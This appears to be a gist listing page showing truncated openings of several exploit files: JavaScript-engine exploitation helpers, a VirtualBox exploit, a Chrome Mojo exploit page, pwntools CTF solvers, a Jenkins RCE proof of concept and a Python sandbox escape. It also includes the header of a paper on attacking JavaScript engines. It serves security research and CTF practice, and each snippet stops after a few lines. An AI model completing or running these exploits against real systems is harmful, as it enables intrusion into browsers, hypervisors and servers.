This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sleep( sleepDuration ){ | |
var now = new Date().getTime(); | |
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
} | |
function gc() { | |
for (let i = 0; i < 0x10; i++) { | |
new ArrayBuffer(0x1000000); | |
} | |
} | |
let data_view = new DataView(new ArrayBuffer(8)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Helpers { | |
constructor() { | |
this.cvt_buf = new ArrayBuffer(8); | |
this.cvt_f64a = new Float64Array(this.cvt_buf); | |
this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
} | |
ftoi(f) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function free(buf) | |
{ | |
%ArrayBufferDetach(buf.buffer); | |
} | |
function u64(buf) | |
{ | |
let x = BigInt(0); | |
for(i=0;i<8;++i) | |
x += BigInt(buf[i]) << BigInt(i*8); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|=-----------------------------------------------------------------------=| | |
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
|=-----------------------------------------------------------------------=| | |
|=------------------------------=[ saelo ]=------------------------------=| | |
|=-----------------------------------------------------------------------=| | |
The following are some brief notes about the changes that have taken place | |
since the release of the "Attacking JavaScript Engines" paper [1]. In | |
general, no big conceptional changes have happened since. Mitigations have | |
been added to break some of the presented techniques and, as expected, a |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author : peternguyen93 | |
import sys | |
sys.path.append('../') # back to vboxlib module | |
from vboxlib.hgcm import * | |
from vboxlib.chromium import * | |
from ctypes import * | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<pre id='log'></pre> | |
<script src="mojo_bindings.js"></script> | |
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> | |
<script src="being_creator_interface.mojom.js"></script> | |
<script src="food_interface.mojom.js"></script> | |
<script src="dog_interface.mojom.js"></script> | |
<script src="person_interface.mojom.js"></script> | |
<script src="cat_interface.mojom.js"></script> | |
<script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
# context(terminal=['tmux', 'new-window']) # open new window | |
# libc = ELF('') | |
elf = ELF('./speedrun-012') | |
context(os='linux', arch=elf.arch) | |
context(log_level='debug') # output verbose log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author: Adam Jordan | |
# Date: 2019-02-15 | |
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc | |
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) | |
import argparse | |
import jenkins |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# import Collection | |
bytearray = ().__class__.__base__.__subclasses__()[5] | |
def p64(addr): | |
x = '{0:016x}'.format(addr) | |
return bytearray.fromhex(x)[::-1] | |
b = Collection.Collection({'1':0x1337}) | |
libc_base = id(b) + 0xe27198 - 0x13e0dd0 |
NewerOlder